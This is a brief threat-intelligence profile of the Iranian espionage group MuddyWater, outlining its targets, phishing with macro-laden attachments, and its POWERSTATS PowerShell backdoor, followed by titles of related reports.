MuddyWater, also known as SeedWorm and TEMP.Zargos, is an Iranian-backed cyber-espionage group is a newer APT (advanced persistent threat) first identified in 2017. They usually target Middle Eastern nations, but have recently shifted focus to include US government agencies, military, SCADA, ICS, and IT firms. The attack typically begins with a phishing email using social engineering to persuade users to enable macros and open any attachments. The malicious attachment contains PowerShell-based Trojans, most recently enabling POWERSTAT v.3. Another TTP (tactics, techniques, and procedures) MuddyWater has recently been observed using is including a number of anti-detection tools during the attack to evade detection.

Technical details and Reporting

MuddyWater Updates POWERSTATS Backdoor For Multi-Stage Attacks

MuddyWater Hacking Group Upgrades Arsenal to Avoid Detection

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign